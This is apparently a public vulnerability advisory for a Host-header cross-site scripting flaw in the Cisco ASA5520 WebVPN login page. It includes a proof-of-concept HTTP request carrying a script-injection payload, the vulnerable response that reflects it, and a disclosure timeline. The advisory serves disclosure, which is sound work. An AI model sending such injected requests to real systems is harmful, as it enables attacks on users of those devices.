- Cisco ASA5520 Web VPN Host Header XSS - Description Cross-site scripting. - Product Cisco, ASA5520, IOS 7.2(2)22 - PoC Modified request: POST /+webvpn+/index.html HTTP/1.1 Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://198.133.219.23/+webvpn+/index.html Accept-Language: en-us Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032) Connection: Keep-Alive Cache-Control: no-cache Cookie: webvpnlogin=1 Content-Length: 66 username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset= Response: HTTP/1.1 200 OK Server: Virata-EmWeb/R6_2_0 Content-Type: text/html Cache-Control: max-age=0 Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/ Set-Cookie: webvpnlogin=1 Content-Length: 5556 <html> <!-- Copyright (c) 2004, 2005 by Cisco Systems, Inc. All rights reserved. --> <head> <META http-equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North America Server" for "http://"'><script>alert('BugsNotHugs')</script><meta httpequiv="" content='"www.owasp.org/+webvpn+/index.html" on "2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Window-target" content="_top"> <title>WebVPN Service</title> - Solution None - Timeline 2007-09-17: Vulnerability Discovered 2008-02-15: Disclosed to Vendor (auto-reply) 2009-04-02: Disclosed to Public (XSS is so 1999)